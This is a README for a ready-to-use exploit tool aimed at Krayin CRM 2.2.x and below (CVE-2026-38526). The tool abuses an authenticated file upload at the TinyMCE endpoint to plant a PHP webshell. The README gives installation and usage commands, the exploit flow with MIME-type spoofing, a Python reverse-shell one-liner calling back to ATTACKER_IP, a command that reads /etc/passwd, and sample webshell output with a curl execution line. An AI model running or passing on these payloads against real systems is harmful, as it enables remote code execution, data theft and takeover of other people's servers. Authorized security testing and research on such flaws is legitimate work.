Share
## https://sploitus.com/exploit?id=33FC4B9A-EBA9-5236-898E-93A2A93C5121
# CVE-2026-38526 - Krayin CRM PHP Upload RCE
Automated exploit for **Krayin CRM โค 2.2.x**. This script exploits an unrestricted file upload vulnerability in the TinyMCE endpoint (`/admin/tinymce/upload`), bypasses MIME-type validation by spoofing `image/jpeg`, uploads a PHP webshell, and executes arbitrary commands with web server privileges.
---
## Vulnerability Details
| Property | Value |
|----------|-------|
| CVE ID | CVE-2026-38526 |
| Affected Software | Krayin CRM โค 2.2.x |
| Vulnerability Type | Unrestricted File Upload โ Remote Code Execution |
| Authentication | Required (any valid admin account) |
| Endpoint | `POST /admin/tinymce/upload` |
---
## Prerequisites
- Python 3.7+
- Valid admin credentials for the target Krayin CRM instance
- Network access to the target application
- `requests` library
---
## Installation
```bash
git clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt
```
---
## Usage
```bash
python3 CVE-2026-38526.py -i -u -p [-c ]
```
### Arguments
| Flag | Description | Example |
|------|-------------|---------|
| `-i` | Target URL (with or without `http://`) | `http://target.com` or `target.com` |
| `-u` | Admin email/username | `admin@target.com` |
| `-p` | Admin password | `AdminPassword123!` |
| `-c` | Command to execute (default: `id`) | `whoami` |
### Examples
```bash
# Basic check
python3 CVE-2026-38526.py -i http://target.com -u admin@target.com -p "AdminPassword123!"
# Custom command
python3 CVE-2026-38526.py -i target.com -u admin@target.com -p "AdminPassword123!" -c "cat /etc/passwd"
# Reverse shell
python3 CVE-2026-38526.py -i target.com -u admin@target.com -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"
```
---
## Exploit Flow
1. **Authentication**: Extract CSRF token from login page, authenticate with provided credentials
2. **Session Validation**: Extract fresh CSRF token from authenticated dashboard
3. **Webshell Upload**: Upload PHP payload to `/admin/tinymce/upload` with spoofed MIME type
4. **Command Execution**: Execute arbitrary commands via webshell GET parameter
---
## Sample Output
```
[*] Target: http://target.com
[*] Username: admin@target.com
[*] Authenticating...
[+] Authentication successful
[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution
[*] Executing: id
[*] Output:
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
uid=33(www-data) gid=33(www-data) groups=33(www-data)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'
```
---
## Common Issues
**Authentication Failed**: Verify credentials are correct and the account exists on the target.
**CSRF Token Extraction Failed**: Ensure the target is running vulnerable Krayin CRM and the login endpoint is accessible.
**Reverse Shell Not Connecting**: Ensure your listener is running (`nc -lvnp `), firewall rules allow outbound connections, and the IP/port in the payload are correct.
---
## Disclaimer
This tool is provided strictly for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal. Users are solely responsible for ensuring they have proper authorization before testing any target system. The author assumes no liability for misuse or damage caused by this tool.
---
## References
- [TREXNEGRO Security Advisory - CVE-2026-38526](https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2026-38526)
- [Krayin CRM GitHub](https://github.com/krayin/laravel-crm)
- [OWASP - Unrestricted File Upload](https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload)
---
## Author
**b0nyo** - PoC Implementation
- [GitHub](https://github.com/b0nyo)
**TREXNEGRO** - Vulnerability Discovery
- [Security Advisories](https://github.com/TREXNEGRO/Security-Advisories)